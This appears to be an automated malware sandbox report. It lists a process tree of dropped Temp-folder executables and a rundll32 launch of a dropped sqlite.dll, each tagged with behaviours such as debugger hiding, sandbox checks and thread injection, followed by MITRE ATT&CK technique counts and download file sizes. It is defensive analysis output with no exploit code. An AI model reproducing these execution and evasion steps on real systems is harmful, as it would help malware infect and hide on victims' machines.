C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 4d2677899b6d76182d6b82aa91be525d vUTNTj+LSkG2KAeaWjURqw.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1436 -ip 14361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3180 -ip 31801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 524 -p 2276 -ip 22761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2600 -ip 26001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5616 -s 4563⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5616 -ip 56161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1008 -ip 10081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2188 -ip 21881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 856 -ip 8561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5720 -ip 57201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2428 -ip 24281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4476 -ip 44761⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5476 -ip 54761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5620 -ip 56201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5560 -ip 55601⤵
-
C:\Users\Admin\AppData\Local\Temp\8BB6.exeC:\Users\Admin\AppData\Local\Temp\8BB6.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\8BB6.exeC:\Users\Admin\AppData\Local\Temp\8BB6.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5668 -ip 56681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\121E.exeC:\Users\Admin\AppData\Local\Temp\121E.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 2762⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Users\Admin\AppData\Local\Temp\23C2.exeC:\Users\Admin\AppData\Local\Temp\23C2.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\35E4.exeC:\Users\Admin\AppData\Local\Temp\35E4.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 3042⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 5368 -ip 53681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\5043.exeC:\Users\Admin\AppData\Local\Temp\5043.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5400 -s 2802⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 3944 -ip 39441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5400 -ip 54001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\AA6E.exeC:\Users\Admin\AppData\Local\Temp\AA6E.exe1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5340 -s 18242⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 5340 -ip 53401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
2Registry Run Keys / Startup Folder
2Scheduled Task
1Defense Evasion
Disabling Security Tools
4Modify Registry
6Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
192KB
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
572KB
-
Filesize
572KB
-
Filesize
572KB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
152KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
140KB
-
Filesize
192KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
64KB
-
Filesize
72KB
-
Filesize
6.1MB
-
Filesize
16KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
472KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
856KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
36KB
-
Filesize
68KB
-
Filesize
136KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
164KB
-
Filesize
288KB
-
Filesize
88KB
-
Filesize
88KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
292KB
-
Filesize
36KB
-
Filesize
2.5MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
16KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
48KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
2.5MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
568KB
-
Filesize
6.1MB
-
Filesize
4KB
-
Filesize
192KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
684KB
-
Filesize
892KB
-
Filesize
856KB
-
Filesize
36KB
-
Filesize
2.5MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB